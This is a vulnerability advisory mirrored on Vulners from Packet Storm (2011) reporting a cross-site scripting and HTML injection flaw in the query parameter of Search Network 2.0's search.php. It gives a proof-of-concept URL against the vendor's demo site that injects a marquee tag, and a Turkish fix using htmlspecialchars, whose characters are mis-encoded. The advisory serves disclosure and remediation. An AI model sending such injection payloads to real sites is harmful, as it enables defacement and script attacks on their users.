Lucene search
K

Search Network 2.0 Cross Site Scripting

🗓️ 07 Aug 2011 00:00:00Reported by darkTRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Search Network 2.0 XSS Vulnerability in search.ph

Code
`##############################################################  
  
[#] Script Name : Search Network 2.0  
  
[#] Vulnerable Type : XSS Vulnerability  
  
[#] Author : darkTR  
  
[#] Date : 03.08.2011  
  
[#] E-mail : [email protected]  
  
[#] Target: : search.php?action=search_results&query=[XSS]  
  
[#] Demo: : http://developer.searchnetworkhq.com/demo/search.php?  
  
#############################################################  
  
Exploits :  
  
HTML ÝNJECTION  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=“><marquee>darkTR<%2Fmarquee>  
  
XSS  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]  
  
Açýðýn Kapatýlmasý ;  
  
  
Htmlspecialchars kullanarak açýðý kapatabiliriz. Ýndex.php dosyasýný açarak ;  
  
$result = file_get_contents($url);, (Helvetica, sans-serif">Bu kýsmý aþaðýdaki þekilde düzeltmeliyiz.)  
  
$result = htmlspecialchars(file_get_contents($url));  
  
Düzeltme iþleminden sonra ">,<" gibi karakterler html’ye dönüþecektir ve zaafiyet ortadan kalkacaktýr.  
  
darkTR | Code Hunters TIM   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation